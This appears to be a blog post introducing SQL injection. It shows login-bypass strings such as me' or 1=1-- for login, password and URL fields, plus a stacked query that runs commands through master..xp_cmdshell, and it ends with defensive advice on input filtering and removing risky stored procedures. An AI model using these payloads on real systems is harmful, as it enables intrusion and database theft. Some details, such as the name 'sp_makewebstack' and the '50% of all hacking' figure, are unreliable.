A simple introduction to SQL injection

A simple introduction to SQL injection

This technology has immense potential for cybercrime attackers and hence also for people required to defend their systems from them. This includes Administrators, website & web application programmers especially the custom ones. There are a myriad of hacking methods but SQL injection accounts for nearly 50% of all hacking.

SQL injection is a kind of an application vulnerability due to user input that’s unsanitized or unverified by the application – Here the application is not thinking of the query statement but just the SQL string to be constructed from the user input . So the hackers can attack the application by passing through SQL statements or commands in SQL legal ways hidden behind which are corrupted and camouflaged strings in such ways that the application fails to detect these and ends up doing things whether just reading or even writing - damaging to the databases of websites of users and companies.

The web apps written in ASP, JSP, PHP & CGI are vulnerable to this interesting technology. The machine port 80, a web browser including a good knowledge of SQL programming & interpretation of errors apart from a good knowledge of SQL databases with some creativity is all that is required of a hacker to become rich overnight by stealing sensitive information from anywhere in the IT industry. This is a dangerous situation relative to the whole planet the earth with terrorism and many serious crimes rampant in this modern age.

So it’s a big responsibility of the Admins and the programmers to be well aware of all the technologies and possible vulnerabilities. They need to safeguard their servers from all such attacks through patches and their applications by sanitizing & verification of all the user inputs before firing it to the database. They should make sure to learn all the tricks of the trade of web vulnerability attacks and be ready for new ones by actively learning ethical hacking and thus keeping one step ahead of attackers.

There are sophisticated automatic software scanners both commercial
and open source, using heuristics and crawlers for websites and
applications, existing in the industry to check vulnerability of any
internet software to SQL injection and many other methods of attack.
These work for many or all existing or known methods and also
databases, languages & any other combinations.

The most attack-prone are user input forms like login, search & feedback etc. The HTML source code can show the FORM tag, POST command, hidden parameters in the URL.




If you can’t find pages taking inputs then look for a URL taking parameters as –
http://test/index.asp?id=10

To test for vulnerability use the single quote trick to begin by adding a single quote corruption in login, password or even URL: me' or 1=1—
Login: me' or 1=1--
Password: me' or 1=1--
URL - http://test/index.asp?id=me' or 1=1—
The possible results are simple login or some useful values, expected or unexpected errors, server errors, straight justified error or ODBC errors. These can all be easily interpreted by the attacker to guess usernames, passwords, tables, columns with their values.

For a hidden field download the HTML source to HD and modify the URL & hidden field accordingly.




This kind of string (me' or 1=1--) can help bypass login and even get extra or all database information depending on how the coding is done in the web application.

The first step is to determine some user names and passwords and if you can find this for the administrator – BINGO. The second is to find table names and columns. The system table names etc are already known being standard.

Even remote execution is feasible thru hacking using stored procedures like master..xp_cmdshell.
'; exec master..xp_cmdshell 'ping 10.10.1.2'--

To get output of the SQL query its possible to use sp_makewebstack
Its also possible to check ODBC errors to specific requests to find key information about the system. INFORMATION_SCHEMA.TABLES is the system table with TABLE_NAME field.

The same way its possible to get columns of tables using INFORMATION_SCHEMA.COLUMNS. Its possible to hack almost anything like the first users username with password.

Its even possible to obtain numeric string values and modify the database contents through update or insert.

This all vulnerability can be prevented by validating all input from users, parameters from URLs, values from cookies by filtering out all characters like single quote, double quote, semi colon, slash, back slash, extended character like NULL, new line, carriage return, etc

For numeric values use ISNUMERIC or conversion to integer before parsing into SQL statement.

Avoid and delete stored procedures like master..Xp_cmdshell, xp_sendmail, xp_startmail, sp_makewebtask etc if not being used.

Modify Startup & run SQL server using low privilege user in SQL Server Security tab.

Comments

Popular Posts